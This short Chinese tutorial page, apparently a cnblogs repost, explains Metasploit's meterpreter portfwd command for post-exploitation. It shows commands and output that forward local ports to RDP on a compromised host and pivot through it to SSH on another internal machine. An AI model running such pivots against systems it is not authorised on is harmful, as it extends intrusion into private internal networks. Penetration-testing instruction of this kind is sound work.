编程语言
首页 > 编程语言> > metasploit后渗透 之 portfwd端口重定向

metasploit后渗透 之 portfwd端口重定向

作者:互联网

meterpreter > portfwd add -l 3333 -p 3389 -r 172.16.100.30
[*] Local TCP relay created: :3333 <-> 172.16.100.30:3389

该命令的意义是,将本地的3333端口的数据转发到远端172.16.100.30的3389端口上去(172.16.100.30是受控机);

 

当然也可以通过受控机将数据转发到内网的其他端口,如下:

meterpreter > portfwd add -l 3334 -p 22 -r 172.16.100.253
[*] Local TCP relay created: :3334 <-> 172.16.100.253:22

该命令的意义是,将本地的3334端口的数据转发到远端172.16.100.253的22端口上去(172.16.100.30是受控机);

 

标签:metasploit,100.30,22,端口,3389,100.253,portfwd,172.16
来源: https://www.cnblogs.com/yyxianren/p/14659145.html